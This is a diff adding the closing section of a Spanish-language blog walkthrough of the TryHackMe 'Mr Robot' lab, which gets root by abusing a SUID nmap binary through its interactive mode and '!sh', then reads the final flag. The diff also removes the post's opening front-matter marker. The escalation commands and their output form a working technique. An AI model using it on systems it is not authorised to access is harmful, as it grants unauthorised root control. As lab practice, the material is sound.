--- a/_posts/2021-11-01-MrRobot.md
+++ b/_posts/2021-11-01-MrRobot.md
@@ -1,4 +1,4 @@
----
+
 title: "tryhackme: Mr Robot"
 share: false
 excerpt: "El mejor metodo de aprendizaje es practicando"
@@ -227,3 +227,40 @@ robot@linux:~$ cat ke*
 cat ke*
 82xc7x956x84fx93xxxbxdexebx9f959
 ```
+
+### ahora a buscar la manera de obtener privilegios root
+
+```bash
+robot@linux:~$ find / --perm -u=s -type f 2>/dev/null
+
+/usr/local/bin/nmap
+```
+
+llama la atención que _nmap_ tenga privilegios SUID, probar usar [gtfobis](https://gtfobins.github.io/gtfobins/nmap/#suid) 
+para abusar de dichos privilegios
+
+```bash
+robot@linux:~$ /usr/local/bin/nmap --interactive
+/usr/local/bin/nmap --interactive
+
+Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
+Welcome to Interactive Mode -- press h <enter> for help
+nmap> !sh
+!sh
+# id
+id
+uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
+```
+ya somos usuarios *root*, solo nos queda encontrar la _flag_ para completar la maquina
+
+```bash
+# cd root
+cd root
+# ls
+ls
+firstboot_done	key-3-of-3.txt
+# cat key-3-of-3.txt
+cat key-3-of-3.txt
+x4x8xxxef27x3dee1ex161bx1x7xbxe4
+```
+## Maquina terminada
